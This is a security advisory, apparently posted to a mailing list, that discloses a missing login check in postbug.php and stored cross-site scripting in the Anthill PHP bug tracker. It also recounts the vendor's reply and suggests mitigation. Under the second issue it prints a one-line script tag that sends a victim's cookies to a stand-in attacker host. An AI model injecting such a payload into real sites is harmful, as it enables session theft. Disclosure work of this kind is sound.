Anthill login and JavaScript vulnerabilities

[Ulf Harnhammar <ulfh () update uu se>]

Anthill login and JavaScript vulnerabilities

PROGRAM: Anthill
VENDOR: Vincent Danen (vdanen () mandrakesoft com)
HOMEPAGE: http://anthill.vmlinuz.ca/
VULNERABLE VERSIONS: all
TYPE: remote
SEVERITY: high


DESCRIPTION:

"Anthill is a bug tracking database system written in PHP. It provides the
standard bug tracking features such as: user logins, summary reports,
submitting bugs, querying bugs, various severity and status levels. It also
provides some unique features, such as a template system, and multi-lingual
support."
(direct quote from the program's project page at Freshmeat)

Anthill was written because the vendor felt that Bugzilla was too complex.
It is published under the terms of the GNU General Public License. The program
is used by the MandrakeSoft Secteam, among others.


ISSUES:

1) New bugs are entered by accessing the script enterbug.php. It POSTs the
data to the script postbug.php, which stores it in the database. enterbug.php
checks if you're logged in, but postbug.php does not. This means that people
without accounts can enter new bugs in the system, by creating an HTML
document like the ones that enterbug.php displays (the same field names, the
same action attribute) and then simply accessing that HTML document locally.

2) Almost everywhere in the program, HTML code is stored and displayed without
any interference. This makes it easy for one user to add JavaScript code that
will be executed by another user. One of the authentication methods supported
is based on cookies. If that method is used, a malicious user may enter a
short JavaScript snippet like:

<script>self.location.href="http://www.evilsite.com/evil?"+escape(document.
cookie)</script>

to steal other people's cookies with their login information.


COMMUNICATION WITH VENDOR:

The vendor was contacted, first on the 16th of March, and then on the 1st of
April. He realizes that these bugs affect the program's security, but he
doesn't have the time to fix them, since this is just a hobby project that he
doesn't get paid for. (Hmm.. I wonder if Richard Stallman or Linus Torvalds
ever thought that way.)


RECOMMENDATION:

No fixed version is currently available. I recommend that all administrators
use their web servers' authentication/access control facilities in their
Anthill directories to keep strangers away, or that they simply change to
some better program.


// Ulf Harnhammar
ulfh () update uu se